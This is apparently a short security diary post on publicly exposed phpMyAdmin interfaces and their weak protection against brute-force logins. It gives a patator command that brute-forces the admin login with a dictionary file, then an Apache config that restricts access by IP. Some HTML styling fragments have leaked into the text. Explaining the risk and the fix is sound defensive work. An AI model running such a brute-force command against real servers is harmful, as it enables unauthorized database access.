PMA (or phpMyAdmin) is a well-known MySQL front-end written in PHP that brings MySQL to the web as stated on the web site[1]. The tool is very popularamongst web developers because it helps to maintain databases just by using a web browser. This also means that the front-end might be publicly exposed! It is a common findingin many penetration tests to find an old PMA interface left byan admin.
Even if PMA restricts access with a login page, there is a lack of protection against brute-force padding:5px 10px"> $ patator http_fuzz url=http://www.acme.org/pma/index.php \ method=POST \ body=pma_username=adminpma_password=COMBO00server=1target=index.phplang=entoken= \ 0=dictionary.txt \ before_urls=http://www.acme.org/pma/index.php \ accept_cookie=1 \ follow=1 \ -x ignore:fgrep=Cannot log in to the MySQL server padding:5px 10px"> Directory /pma order deny,allow deny from all allow from 10.0.0.1 allow from 10.0.0.2 /Directory
[1]https://www.phpmyadmin.net/
[2]https://github.com/lanjelot/patator
[3]https://www.cvedetails.com/vulnerability-list/vendor_id-784/cvssscoremin-7/cvssscoremax-7.99/Phpmyadmin.html
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key